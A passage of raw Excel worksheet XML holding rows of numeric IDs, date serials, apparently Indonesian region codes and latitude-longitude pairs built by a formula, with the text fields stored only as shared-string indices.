        <v>1307</v>
      </c>
      <c r="T4141" t="s">
        <v>1308</v>
      </c>
      <c r="U4141" s="5">
        <v>1168683743</v>
      </c>
      <c r="V4141" s="5" t="s">
        <v>18202</v>
      </c>
      <c r="W4141" s="5">
        <v>-12564713</v>
      </c>
      <c r="X4141" t="s">
        <v>21935</v>
      </c>
      <c r="Y4141" t="str">
        <f t="shared" si="64"/>
        <v>-1.2564713,116.8683743</v>
      </c>
    </row>
    <row r="4142" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4142">
        <v>299468</v>
      </c>
      <c r="B4142" s="1">
        <v>44539</v>
      </c>
      <c r="C4142" t="s">
        <v>14125</v>
      </c>
      <c r="D4142" t="s">
        <v>22</v>
      </c>
      <c r="E4142" t="s">
        <v>23</v>
      </c>
      <c r="F4142" t="s">
        <v>14126</v>
      </c>
      <c r="G4142" t="s">
        <v>14127</v>
      </c>
      <c r="H4142" t="s">
        <v>26</v>
      </c>
      <c r="I4142" t="s">
        <v>137</v>
      </c>
      <c r="J4142" t="s">
        <v>10520</v>
      </c>
      <c r="L4142" t="s">
        <v>14128</v>
      </c>
      <c r="M4142">
        <v>7471022002</v>
      </c>
      <c r="N4142">
        <v>7471022</v>
      </c>
      <c r="O4142">
        <v>7471</v>
      </c>
      <c r="P4142">
        <v>74</v>
      </c>
      <c r="Q4142" t="s">
        <v>14129</v>
      </c>
      <c r="R4142" t="s">
        <v>14129</v>
      </c>
      <c r="S4142" t="s">
        <v>14130</v>
      </c>
      <c r="T4142" t="s">
        <v>10524</v>
      </c>
      <c r="U4142" s="5">
        <v>1225282860</v>
      </c>
      <c r="V4142" s="5" t="s">
        <v>18203</v>
      </c>
      <c r="W4142" s="5">
        <v>-40074036</v>
      </c>
      <c r="X4142" t="s">
        <v>21936</v>
      </c>
      <c r="Y4142" t="str">
        <f t="shared" si="64"/>
        <v>-4.0074036,122.5282860</v>
      </c>
    </row>
    <row r="4143" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4143">
        <v>299480</v>
      </c>
      <c r="B4143" s="1">
        <v>44539</v>
      </c>
      <c r="C4143" t="s">
        <v>14131</v>
      </c>
      <c r="D4143" t="s">
        <v>22</v>
      </c>
      <c r="E4143" t="s">
        <v>23</v>
      </c>
      <c r="F4143" t="s">
        <v>14132</v>
      </c>
      <c r="G4143" t="s">
        <v>14133</v>
      </c>
      <c r="H4143" t="s">
        <v>9262</v>
      </c>
      <c r="I4143" t="s">
        <v>14134</v>
      </c>
      <c r="J4143" t="s">
        <v>2615</v>
      </c>
      <c r="L4143" t="s">
        <v>14135</v>
      </c>
      <c r="M4143">
        <v>3404160004</v>
      </c>
      <c r="N4143">
        <v>3404160</v>
      </c>
      <c r="O4143">
        <v>3404</v>
      </c>
      <c r="P4143">
        <v>34</v>
      </c>
      <c r="Q4143" t="s">
        <v>14136</v>
      </c>
      <c r="R4143" t="s">
        <v>13073</v>
      </c>
      <c r="S4143" t="s">
        <v>1855</v>
      </c>
      <c r="T4143" t="s">
        <v>1856</v>
      </c>
      <c r="U4143" s="5">
        <v>1104195960</v>
      </c>
      <c r="V4143" s="5" t="s">
        <v>18204</v>
      </c>
      <c r="W4143" s="5">
        <v>-76562552</v>
      </c>
      <c r="X4143" t="s">
        <v>21937</v>
      </c>
      <c r="Y4143" t="str">
        <f t="shared" si="64"/>
        <v>-7.6562552,110.4195960</v>
      </c>
    </row>
    <row r="4144" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4144">
        <v>299485</v>
      </c>
      <c r="B4144" s="1">
        <v>44540</v>
      </c>
      <c r="C4144" t="s">
        <v>14137</v>
      </c>
      <c r="D4144" t="s">
        <v>22</v>
      </c>
      <c r="E4144" t="s">
        <v>23</v>
      </c>
      <c r="F4144" t="s">
        <v>14138</v>
      </c>
      <c r="G4144" t="s">
        <v>14139</v>
      </c>
      <c r="H4144" t="s">
        <v>9262</v>
      </c>
      <c r="I4144" t="s">
        <v>14140</v>
      </c>
      <c r="J4144" t="s">
        <v>2622</v>
      </c>
      <c r="L4144" t="s">
        <v>14141</v>
      </c>
      <c r="M4144">
        <v>3508020006</v>
      </c>
      <c r="N4144">
        <v>3508020</v>
      </c>
      <c r="O4144">
        <v>3508</v>
      </c>
      <c r="P4144">
        <v>35</v>
      </c>
      <c r="Q4144" t="s">
        <v>14142</v>
      </c>
      <c r="R4144" t="s">
        <v>14143</v>
      </c>
      <c r="S4144" t="s">
        <v>14144</v>
      </c>
      <c r="T4144" t="s">
        <v>1221</v>
      </c>
      <c r="U4144" s="5">
        <v>1129806842</v>
      </c>
      <c r="V4144" s="5" t="s">
        <v>18205</v>
      </c>
      <c r="W4144" s="5">
        <v>-81753274</v>
      </c>
      <c r="X4144" t="s">
        <v>21938</v>
      </c>
      <c r="Y4144" t="str">
        <f t="shared" si="64"/>
        <v>-8.1753274,112.9806842</v>
      </c>
    </row>
    <row r="4145" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4145">
        <v>299492</v>
      </c>
      <c r="B4145" s="1">
        <v>44540</v>
      </c>
      <c r="C4145" t="s">
        <v>14145</v>
      </c>
      <c r="D4145" t="s">
        <v>22</v>
      </c>
      <c r="E4145" t="s">
        <v>23</v>
      </c>
      <c r="F4145" t="s">
        <v>14146</v>
      </c>
      <c r="G4145" t="s">
        <v>14147</v>
      </c>
      <c r="H4145" t="s">
        <v>26</v>
      </c>
      <c r="I4145" t="s">
        <v>1633</v>
      </c>
      <c r="J4145" t="s">
        <v>7178</v>
      </c>
      <c r="L4145" t="s">
        <v>14148</v>
      </c>
      <c r="M4145">
        <v>1809060999</v>
      </c>
      <c r="N4145">
        <v>1809060</v>
      </c>
      <c r="O4145">
        <v>1809</v>
      </c>
      <c r="P4145">
        <v>18</v>
      </c>
      <c r="Q4145" t="s">
        <v>12571</v>
      </c>
      <c r="R4145" t="s">
        <v>14149</v>
      </c>
      <c r="S4145" t="s">
        <v>14150</v>
      </c>
      <c r="T4145" t="s">
        <v>2082</v>
      </c>
      <c r="U4145" s="5">
        <v>1052152454</v>
      </c>
      <c r="V4145" s="5" t="s">
        <v>18206</v>
      </c>
      <c r="W4145" s="5">
        <v>-53671517</v>
      </c>
      <c r="X4145" t="s">
        <v>21939</v>
      </c>
      <c r="Y4145" t="str">
        <f t="shared" si="64"/>
        <v>-5.3671517,105.2152454</v>
      </c>
    </row>
    <row r="4146" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4146">
        <v>299499</v>
      </c>
      <c r="B4146" s="1">
        <v>44543</v>
      </c>
      <c r="C4146" t="s">
        <v>14151</v>
      </c>
      <c r="D4146" t="s">
        <v>85</v>
      </c>
      <c r="E4146" t="s">
        <v>23</v>
      </c>
      <c r="F4146" t="s">
        <v>14152</v>
      </c>
      <c r="G4146" t="s">
        <v>14153</v>
      </c>
      <c r="H4146" t="s">
        <v>26</v>
      </c>
      <c r="J4146" t="s">
        <v>7630</v>
      </c>
      <c r="K4146" t="s">
        <v>14154</v>
      </c>
      <c r="L4146" t="s">
        <v>14155</v>
      </c>
      <c r="M4146">
        <v>3171100003</v>
      </c>
      <c r="N4146">
        <v>3171100</v>
      </c>
      <c r="O4146">
        <v>3171</v>
      </c>
      <c r="P4146">
        <v>31</v>
      </c>
      <c r="Q4146" t="s">
        <v>3246</v>
      </c>
      <c r="R4146" t="s">
        <v>107</v>
      </c>
      <c r="S4146" t="s">
        <v>108</v>
      </c>
      <c r="T4146" t="s">
        <v>33</v>
      </c>
      <c r="U4146" s="5">
        <v>1068348718</v>
      </c>
      <c r="V4146" s="5" t="s">
        <v>18207</v>
      </c>
      <c r="W4146" s="5">
        <v>-62190526</v>
      </c>
      <c r="X4146" t="s">
        <v>21940</v>
      </c>
      <c r="Y4146" t="str">
        <f t="shared" si="64"/>
        <v>-6.2190526,106.8348718</v>
      </c>
    </row>
    <row r="4147" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4147">
        <v>299503</v>
      </c>
      <c r="B4147" s="1">
        <v>44543</v>
      </c>
      <c r="C4147" t="s">
        <v>14156</v>
      </c>
      <c r="D4147" t="s">
        <v>22</v>
      </c>
      <c r="E4147" t="s">
        <v>23</v>
      </c>
      <c r="F4147" t="s">
        <v>14157</v>
      </c>
      <c r="H4147" t="s">
        <v>26</v>
      </c>
      <c r="I4147" t="s">
        <v>166</v>
      </c>
      <c r="J4147" t="s">
        <v>2627</v>
      </c>
      <c r="L4147" t="s">
        <v>14158</v>
      </c>
      <c r="M4147">
        <v>3204290006</v>
      </c>
      <c r="N4147">
        <v>3204290</v>
      </c>
      <c r="O4147">
        <v>3204</v>
      </c>
      <c r="P4147">
        <v>32</v>
      </c>
      <c r="Q4147" t="s">
        <v>14159</v>
      </c>
      <c r="R4147" t="s">
        <v>2170</v>
      </c>
      <c r="S4147" t="s">
        <v>1464</v>
      </c>
      <c r="T4147" t="s">
        <v>42</v>
      </c>
      <c r="U4147" s="5">
        <v>1077237527</v>
      </c>
      <c r="V4147" s="5" t="s">
        <v>18208</v>
      </c>
      <c r="W4147" s="5">
        <v>-69332595</v>
      </c>
      <c r="X4147" t="s">
        <v>21941</v>
      </c>
      <c r="Y4147" t="str">
        <f t="shared" si="64"/>
        <v>-6.9332595,107.7237527</v>
      </c>
    </row>
    <row r="4148" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4148">
        <v>299504</v>
      </c>
      <c r="B4148" s="1">
        <v>44543</v>
      </c>
      <c r="C4148" t="s">
        <v>14160</v>
      </c>
      <c r="D4148" t="s">
        <v>22</v>
      </c>
      <c r="E4148" t="s">
        <v>23</v>
      </c>
      <c r="F4148" t="s">
        <v>14161</v>
      </c>
      <c r="H4148" t="s">
        <v>26</v>
      </c>
      <c r="I4148" t="s">
        <v>166</v>
      </c>
      <c r="J4148" t="s">
        <v>2627</v>
      </c>
      <c r="L4148" t="s">
        <v>14162</v>
      </c>
      <c r="M4148">
        <v>3204290006</v>
      </c>
      <c r="N4148">
        <v>3204290</v>
      </c>
      <c r="O4148">
        <v>3204</v>
      </c>
      <c r="P4148">
        <v>32</v>
      </c>
      <c r="Q4148" t="s">
        <v>14159</v>
      </c>
      <c r="R4148" t="s">
        <v>2170</v>
      </c>
      <c r="S4148" t="s">
        <v>1464</v>
      </c>
      <c r="T4148" t="s">
        <v>42</v>
      </c>
      <c r="U4148" s="5">
        <v>1077238117</v>
      </c>
      <c r="V4148" s="5" t="s">
        <v>18209</v>
      </c>
      <c r="W4148" s="5">
        <v>-69333497</v>
      </c>
      <c r="X4148" t="s">
        <v>21942</v>
      </c>
      <c r="Y4148" t="str">
        <f t="shared" si="64"/>
        <v>-6.9333497,107.7238117</v>
      </c>
    </row>
    <row r="4149" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4149">
        <v>299508</v>
      </c>
      <c r="B4149" s="1">
        <v>44544</v>
      </c>
      <c r="C4149" t="s">
        <v>14163</v>
      </c>
      <c r="D4149" t="s">
        <v>22</v>
      </c>
      <c r="E4149" t="s">
        <v>23</v>
      </c>
      <c r="F4149" t="s">
        <v>14164</v>
      </c>
      <c r="H4149" t="s">
        <v>7086</v>
      </c>
      <c r="I4149" t="s">
        <v>7733</v>
      </c>
      <c r="J4149" t="s">
        <v>6626</v>
      </c>
      <c r="L4149" t="s">
        <v>14165</v>
      </c>
      <c r="M4149">
        <v>7371031005</v>
      </c>
      <c r="N4149">
        <v>7371031</v>
      </c>
      <c r="O4149">
        <v>7371</v>
      </c>
      <c r="P4149">
        <v>73</v>
      </c>
      <c r="Q4149" t="s">
        <v>14166</v>
      </c>
      <c r="R4149" t="s">
        <v>14062</v>
      </c>
      <c r="S4149" t="s">
        <v>6629</v>
      </c>
      <c r="T4149" t="s">
        <v>6630</v>
      </c>
      <c r="U4149" s="5">
        <v>1194461060</v>
      </c>
      <c r="V4149" s="5" t="s">
        <v>18210</v>
      </c>
      <c r="W4149" s="5">
        <v>-51702759</v>
      </c>
      <c r="X4149" t="s">
        <v>21943</v>
      </c>
      <c r="Y4149" t="str">
        <f t="shared" si="64"/>
        <v>-5.1702759,119.4461060</v>
      </c>
    </row>
    <row r="4150" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4150">
        <v>299509</v>
      </c>
      <c r="B4150" s="1">
        <v>44544</v>
      </c>
      <c r="C4150" t="s">
        <v>14167</v>
      </c>
      <c r="D4150" t="s">
        <v>22</v>
      </c>
      <c r="E4150" t="s">
        <v>23</v>
      </c>
      <c r="F4150" t="s">
        <v>14168</v>
      </c>
      <c r="H4150" t="s">
        <v>7086</v>
      </c>
      <c r="I4150" t="s">
        <v>7733</v>
      </c>
      <c r="J4150" t="s">
        <v>12102</v>
      </c>
      <c r="L4150" t="s">
        <v>14169</v>
      </c>
      <c r="M4150">
        <v>5315010010</v>
      </c>
      <c r="N4150">
        <v>5315010</v>
      </c>
      <c r="O4150">
        <v>5315</v>
      </c>
      <c r="P4150">
        <v>53</v>
      </c>
      <c r="Q4150" t="s">
        <v>6501</v>
      </c>
      <c r="R4150" t="s">
        <v>14170</v>
      </c>
      <c r="S4150" t="s">
        <v>14171</v>
      </c>
      <c r="T4150" t="s">
        <v>12107</v>
      </c>
      <c r="U4150" s="5">
        <v>1198828983</v>
      </c>
      <c r="V4150" s="5" t="s">
        <v>18211</v>
      </c>
      <c r="W4150" s="5">
        <v>-84999616</v>
      </c>
      <c r="X4150" t="s">
        <v>21944</v>
      </c>
      <c r="Y4150" t="str">
        <f t="shared" si="64"/>
        <v>-8.4999616,119.8828983</v>
      </c>
    </row>
    <row r="4151" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4151">
        <v>299511</v>
      </c>
      <c r="B4151" s="1">
        <v>44544</v>
      </c>
      <c r="C4151" t="s">
        <v>14172</v>
      </c>
      <c r="D4151" t="s">
        <v>22</v>
      </c>
      <c r="E4151" t="s">
        <v>23</v>
      </c>
      <c r="F4151" t="s">
        <v>14173</v>
      </c>
      <c r="G4151" t="s">
        <v>14174</v>
      </c>
      <c r="H4151" t="s">
        <v>7086</v>
      </c>
      <c r="I4151" t="s">
        <v>7733</v>
      </c>
      <c r="J4151" t="s">
        <v>6626</v>
      </c>
      <c r="L4151" t="s">
        <v>14175</v>
      </c>
      <c r="M4151">
        <v>7305031007</v>
      </c>
      <c r="N4151">
        <v>7305031</v>
      </c>
      <c r="O4151">
        <v>7305</v>
      </c>
      <c r="P4151">
        <v>73</v>
      </c>
      <c r="Q4151" t="s">
        <v>14176</v>
      </c>
      <c r="R4151" t="s">
        <v>14177</v>
      </c>
      <c r="S4151" t="s">
        <v>14178</v>
      </c>
      <c r="T4151" t="s">
        <v>6630</v>
      </c>
      <c r="U4151" s="5">
        <v>1194430161</v>
      </c>
      <c r="V4151" s="5" t="s">
        <v>18212</v>
      </c>
      <c r="W4151" s="5">
        <v>-54153070</v>
      </c>
      <c r="X4151" t="s">
        <v>21945</v>
      </c>
      <c r="Y4151" t="str">
        <f t="shared" si="64"/>
        <v>-5.4153070,119.4430161</v>
      </c>
    </row>
    <row r="4152" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4152">
        <v>299512</v>
      </c>
      <c r="B4152" s="1">
        <v>44544</v>
      </c>
      <c r="C4152" t="s">
        <v>14179</v>
      </c>
      <c r="D4152" t="s">
        <v>22</v>
      </c>
      <c r="E4152" t="s">
        <v>23</v>
      </c>
      <c r="F4152" t="s">
        <v>14180</v>
      </c>
      <c r="G4152" t="s">
        <v>14181</v>
      </c>
      <c r="H4152" t="s">
        <v>7086</v>
      </c>
      <c r="I4152" t="s">
        <v>7733</v>
      </c>
      <c r="J4152" t="s">
        <v>6626</v>
      </c>
      <c r="L4152" t="s">
        <v>14182</v>
      </c>
      <c r="M4152">
        <v>7303020002</v>
      </c>
      <c r="N4152">
        <v>7303020</v>
      </c>
      <c r="O4152">
        <v>7303</v>
      </c>
      <c r="P4152">
        <v>73</v>
      </c>
      <c r="Q4152" t="s">
        <v>14113</v>
      </c>
      <c r="R4152" t="s">
        <v>7372</v>
      </c>
      <c r="S4152" t="s">
        <v>7372</v>
      </c>
      <c r="T4152" t="s">
        <v>6630</v>
      </c>
      <c r="U4152" s="5">
        <v>1199484086</v>
      </c>
      <c r="V4152" s="5" t="s">
        <v>18213</v>
      </c>
      <c r="W4152" s="5">
        <v>-55455549</v>
      </c>
      <c r="X4152" t="s">
        <v>21946</v>
      </c>
      <c r="Y4152" t="str">
        <f t="shared" si="64"/>
        <v>-5.5455549,119.9484086</v>
      </c>
    </row>
    <row r="4153" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4153">
        <v>299516</v>
      </c>
      <c r="B4153" s="1">
        <v>44544</v>
      </c>
      <c r="C4153" t="s">
        <v>14183</v>
      </c>
      <c r="D4153" t="s">
        <v>22</v>
      </c>
      <c r="E4153" t="s">
        <v>23</v>
      </c>
      <c r="F4153" t="s">
        <v>14184</v>
      </c>
      <c r="G4153" t="s">
        <v>14185</v>
      </c>
      <c r="H4153" t="s">
        <v>7086</v>
      </c>
      <c r="I4153" t="s">
        <v>7087</v>
      </c>
      <c r="J4153" t="s">
        <v>6626</v>
      </c>
      <c r="L4153" t="s">
        <v>14186</v>
      </c>
      <c r="M4153">
        <v>7301010006</v>
      </c>
      <c r="N4153">
        <v>7301010</v>
      </c>
      <c r="O4153">
        <v>7301</v>
      </c>
      <c r="P4153">
        <v>73</v>
      </c>
      <c r="Q4153" t="s">
        <v>14187</v>
      </c>
      <c r="R4153" t="s">
        <v>14188</v>
      </c>
      <c r="S4153" t="s">
        <v>14189</v>
      </c>
      <c r="T4153" t="s">
        <v>6630</v>
      </c>
      <c r="U4153" s="5">
        <v>1211491489</v>
      </c>
      <c r="V4153" s="5" t="s">
        <v>18214</v>
      </c>
      <c r="W4153" s="5">
        <v>-73571591</v>
      </c>
      <c r="X4153" t="s">
        <v>21947</v>
      </c>
      <c r="Y4153" t="str">
        <f t="shared" si="64"/>
        <v>-7.3571591,121.1491489</v>
      </c>
    </row>
    <row r="4154" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4154">
        <v>299525</v>
      </c>
      <c r="B4154" s="1">
        <v>44545</v>
      </c>
      <c r="C4154" t="s">
        <v>14190</v>
      </c>
      <c r="D4154" t="s">
        <v>22</v>
      </c>
      <c r="E4154" t="s">
        <v>23</v>
      </c>
      <c r="F4154" t="s">
        <v>14191</v>
      </c>
      <c r="G4154" t="s">
        <v>14192</v>
      </c>
      <c r="H4154" t="s">
        <v>26</v>
      </c>
      <c r="I4154" t="s">
        <v>14193</v>
      </c>
      <c r="J4154" t="s">
        <v>6509</v>
      </c>
      <c r="M4154">
        <v>6303050001</v>
      </c>
      <c r="N4154">
        <v>6303050</v>
      </c>
      <c r="O4154">
        <v>6303</v>
      </c>
      <c r="P4154">
        <v>63</v>
      </c>
      <c r="Q4154" t="s">
        <v>8767</v>
      </c>
      <c r="R4154" t="s">
        <v>8759</v>
      </c>
      <c r="S4154" t="s">
        <v>8751</v>
      </c>
      <c r="T4154" t="s">
        <v>6513</v>
      </c>
      <c r="U4154" s="5">
        <v>1148466110</v>
      </c>
      <c r="V4154" s="5" t="s">
        <v>18215</v>
      </c>
      <c r="W4154" s="5">
        <v>-33979424</v>
      </c>
      <c r="X4154" t="s">
        <v>21948</v>
      </c>
      <c r="Y4154" t="str">
        <f t="shared" si="64"/>
        <v>-3.3979424,114.8466110</v>
      </c>
    </row>
    <row r="4155" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4155">
        <v>299526</v>
      </c>
      <c r="B4155" s="1">
        <v>44545</v>
      </c>
      <c r="C4155" t="s">
        <v>14194</v>
      </c>
      <c r="D4155" t="s">
        <v>22</v>
      </c>
      <c r="E4155" t="s">
        <v>23</v>
      </c>
      <c r="F4155" t="s">
        <v>14195</v>
      </c>
      <c r="G4155" t="s">
        <v>14196</v>
      </c>
      <c r="H4155" t="s">
        <v>26</v>
      </c>
      <c r="I4155" t="s">
        <v>1513</v>
      </c>
      <c r="J4155" t="s">
        <v>6509</v>
      </c>
      <c r="L4155" t="s">
        <v>14197</v>
      </c>
      <c r="M4155">
        <v>6303050037</v>
      </c>
      <c r="N4155">
        <v>6303050</v>
      </c>
      <c r="O4155">
        <v>6303</v>
      </c>
      <c r="P4155">
        <v>63</v>
      </c>
      <c r="Q4155" t="s">
        <v>9328</v>
      </c>
      <c r="R4155" t="s">
        <v>8759</v>
      </c>
      <c r="S4155" t="s">
        <v>8751</v>
      </c>
      <c r="T4155" t="s">
        <v>6513</v>
      </c>
      <c r="U4155" s="5">
        <v>1148418617</v>
      </c>
      <c r="V4155" s="5" t="s">
        <v>18216</v>
      </c>
      <c r="W4155" s="5">
        <v>-33905007</v>
      </c>
      <c r="X4155" t="s">
        <v>21949</v>
      </c>
      <c r="Y4155" t="str">
        <f t="shared" si="64"/>
        <v>-3.3905007,114.8418617</v>
      </c>
    </row>
    <row r="4156" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4156">
        <v>299527</v>
      </c>
      <c r="B4156" s="1">
        <v>44545</v>
      </c>
      <c r="C4156" t="s">
        <v>14198</v>
      </c>
      <c r="D4156" t="s">
        <v>22</v>
      </c>
      <c r="E4156" t="s">
        <v>23</v>
      </c>
      <c r="F4156" t="s">
        <v>14199</v>
      </c>
      <c r="G4156" t="s">
        <v>14200</v>
      </c>
      <c r="H4156" t="s">
        <v>26</v>
      </c>
      <c r="I4156" t="s">
        <v>131</v>
      </c>
      <c r="J4156" t="s">
        <v>6509</v>
      </c>
      <c r="M4156">
        <v>6303120008</v>
      </c>
      <c r="N4156">
        <v>6303120</v>
      </c>
      <c r="O4156">
        <v>6303</v>
      </c>
      <c r="P4156">
        <v>63</v>
      </c>
      <c r="Q4156" t="s">
        <v>8799</v>
      </c>
      <c r="R4156" t="s">
        <v>8800</v>
      </c>
      <c r="S4156" t="s">
        <v>8751</v>
      </c>
      <c r="T4156" t="s">
        <v>6513</v>
      </c>
      <c r="U4156" s="5">
        <v>1150941038</v>
      </c>
      <c r="V4156" s="5" t="s">
        <v>18217</v>
      </c>
      <c r="W4156" s="5">
        <v>-32956889</v>
      </c>
      <c r="X4156" t="s">
        <v>21950</v>
      </c>
      <c r="Y4156" t="str">
        <f t="shared" si="64"/>
        <v>-3.2956889,115.0941038</v>
      </c>
    </row>
    <row r="4157" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4157">
        <v>299528</v>
      </c>
      <c r="B4157" s="1">
        <v>44545</v>
      </c>
      <c r="C4157" t="s">
        <v>14201</v>
      </c>
      <c r="D4157" t="s">
        <v>22</v>
      </c>
      <c r="E4157" t="s">
        <v>23</v>
      </c>
      <c r="F4157" t="s">
        <v>14202</v>
      </c>
      <c r="G4157" t="s">
        <v>14203</v>
      </c>
      <c r="H4157" t="s">
        <v>26</v>
      </c>
      <c r="I4157" t="s">
        <v>193</v>
      </c>
      <c r="J4157" t="s">
        <v>6509</v>
      </c>
      <c r="M4157">
        <v>6303060006</v>
      </c>
      <c r="N4157">
        <v>6303060</v>
      </c>
      <c r="O4157">
        <v>6303</v>
      </c>
      <c r="P4157">
        <v>63</v>
      </c>
      <c r="Q4157" t="s">
        <v>889</v>
      </c>
      <c r="R4157" t="s">
        <v>8750</v>
      </c>
      <c r="S4157" t="s">
        <v>8751</v>
      </c>
      <c r="T4157" t="s">
        <v>6513</v>
      </c>
      <c r="U4157" s="5">
        <v>1149534702</v>
      </c>
      <c r="V4157" s="5" t="s">
        <v>18218</v>
      </c>
      <c r="W4157" s="5">
        <v>-33462011</v>
      </c>
      <c r="X4157" t="s">
        <v>21951</v>
      </c>
      <c r="Y4157" t="str">
        <f t="shared" si="64"/>
        <v>-3.3462011,114.9534702</v>
      </c>
    </row>
    <row r="4158" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4158">
        <v>299529</v>
      </c>
      <c r="B4158" s="1">
        <v>44545</v>
      </c>
      <c r="C4158" t="s">
        <v>14204</v>
      </c>
      <c r="D4158" t="s">
        <v>22</v>
      </c>
      <c r="E4158" t="s">
        <v>23</v>
      </c>
      <c r="F4158" t="s">
        <v>14205</v>
      </c>
      <c r="G4158" t="s">
        <v>14206</v>
      </c>
      <c r="H4158" t="s">
        <v>26</v>
      </c>
      <c r="I4158" t="s">
        <v>137</v>
      </c>
      <c r="J4158" t="s">
        <v>6509</v>
      </c>
      <c r="L4158" t="s">
        <v>14207</v>
      </c>
      <c r="M4158">
        <v>6303052002</v>
      </c>
      <c r="N4158">
        <v>6303052</v>
      </c>
      <c r="O4158">
        <v>6303</v>
      </c>
      <c r="P4158">
        <v>63</v>
      </c>
      <c r="Q4158" t="s">
        <v>10034</v>
      </c>
      <c r="R4158" t="s">
        <v>9004</v>
      </c>
      <c r="S4158" t="s">
        <v>8751</v>
      </c>
      <c r="T4158" t="s">
        <v>6513</v>
      </c>
      <c r="U4158" s="5">
        <v>1148378491</v>
      </c>
      <c r="V4158" s="5" t="s">
        <v>18219</v>
      </c>
      <c r="W4158" s="5">
        <v>-33809098</v>
      </c>
      <c r="X4158" t="s">
        <v>21952</v>
      </c>
      <c r="Y4158" t="str">
        <f t="shared" si="64"/>
        <v>-3.3809098,114.8378491</v>
      </c>
    </row>
    <row r="4159" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4159">
        <v>299530</v>
      </c>
      <c r="B4159" s="1">
        <v>44545</v>
      </c>
      <c r="C4159" t="s">
        <v>14208</v>
      </c>
      <c r="D4159" t="s">
        <v>22</v>
      </c>
      <c r="E4159" t="s">
        <v>23</v>
      </c>
      <c r="F4159" t="s">
        <v>14209</v>
      </c>
      <c r="G4159" t="s">
        <v>14210</v>
      </c>
      <c r="H4159" t="s">
        <v>26</v>
      </c>
      <c r="I4159" t="s">
        <v>1633</v>
      </c>
      <c r="J4159" t="s">
        <v>6509</v>
      </c>
      <c r="M4159">
        <v>6303060001</v>
      </c>
      <c r="N4159">
        <v>6303060</v>
      </c>
      <c r="O4159">
        <v>6303</v>
      </c>
      <c r="P4159">
        <v>63</v>
      </c>
      <c r="Q4159" t="s">
        <v>8790</v>
      </c>
      <c r="R4159" t="s">
        <v>8750</v>
      </c>
      <c r="S4159" t="s">
        <v>8751</v>
      </c>
      <c r="T4159" t="s">
        <v>6513</v>
      </c>
      <c r="U4159" s="5">
        <v>1149163055</v>
      </c>
      <c r="V4159" s="5" t="s">
        <v>18220</v>
      </c>
      <c r="W4159" s="5">
        <v>-33631665</v>
      </c>
      <c r="X4159" t="s">
        <v>21953</v>
      </c>
      <c r="Y4159" t="str">
        <f t="shared" si="64"/>
        <v>-3.3631665,114.9163055</v>
      </c>
    </row>
    <row r="4160" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4160">
        <v>299531</v>
      </c>
      <c r="B4160" s="1">
        <v>44545</v>
      </c>
      <c r="C4160" t="s">
        <v>14211</v>
      </c>
      <c r="D4160" t="s">
        <v>22</v>
      </c>
      <c r="E4160" t="s">
        <v>23</v>
      </c>
      <c r="F4160" t="s">
        <v>14212</v>
      </c>
      <c r="G4160" t="s">
        <v>14213</v>
      </c>
      <c r="H4160" t="s">
        <v>26</v>
      </c>
      <c r="I4160" t="s">
        <v>7477</v>
      </c>
      <c r="J4160" t="s">
        <v>6707</v>
      </c>
      <c r="L4160" t="s">
        <v>14214</v>
      </c>
      <c r="M4160">
        <v>5201060001</v>
      </c>
      <c r="N4160">
        <v>5201060</v>
      </c>
      <c r="O4160">
        <v>5201</v>
      </c>
      <c r="P4160">
        <v>52</v>
      </c>
      <c r="Q4160" t="s">
        <v>14215</v>
      </c>
      <c r="R4160" t="s">
        <v>13757</v>
      </c>
      <c r="S4160" t="s">
        <v>13758</v>
      </c>
      <c r="T4160" t="s">
        <v>2154</v>
      </c>
      <c r="U4160" s="5">
        <v>1160847610</v>
      </c>
      <c r="V4160" s="5" t="s">
        <v>18221</v>
      </c>
      <c r="W4160" s="5">
        <v>-85486515</v>
      </c>
      <c r="X4160" t="s">
        <v>21954</v>
      </c>
      <c r="Y4160" t="str">
        <f t="shared" si="64"/>
        <v>-8.5486515,116.0847610</v>
      </c>
    </row>
    <row r="4161" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4161">
        <v>299532</v>
      </c>
      <c r="B4161" s="1">
        <v>44545</v>
      </c>
      <c r="C4161" t="s">
        <v>14216</v>
      </c>
      <c r="D4161" t="s">
        <v>22</v>
      </c>
      <c r="E4161" t="s">
        <v>23</v>
      </c>
      <c r="F4161" t="s">
        <v>14217</v>
      </c>
      <c r="G4161" t="s">
        <v>14218</v>
      </c>
      <c r="H4161" t="s">
        <v>26</v>
      </c>
      <c r="I4161" t="s">
        <v>1359</v>
      </c>
      <c r="J4161" t="s">
        <v>6509</v>
      </c>
      <c r="M4161">
        <v>6303040006</v>
      </c>
      <c r="N4161">
        <v>6303040</v>
      </c>
      <c r="O4161">
        <v>6303</v>
      </c>
      <c r="P4161">
        <v>63</v>
      </c>
      <c r="Q4161" t="s">
        <v>14219</v>
      </c>
      <c r="R4161" t="s">
        <v>8809</v>
      </c>
      <c r="S4161" t="s">
        <v>8751</v>
      </c>
      <c r="T4161" t="s">
        <v>6513</v>
      </c>
      <c r="U4161" s="5">
        <v>1147229290</v>
      </c>
      <c r="V4161" s="5" t="s">
        <v>18222</v>
      </c>
      <c r="W4161" s="5">
        <v>-33225948</v>
      </c>
      <c r="X4161" t="s">
        <v>21955</v>
      </c>
      <c r="Y4161" t="str">
        <f t="shared" si="64"/>
        <v>-3.3225948,114.7229290</v>
      </c>
    </row>
    <row r="4162" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4162">
        <v>299533</v>
      </c>
      <c r="B4162" s="1">
        <v>44545</v>
      </c>
      <c r="C4162" t="s">
        <v>14220</v>
      </c>
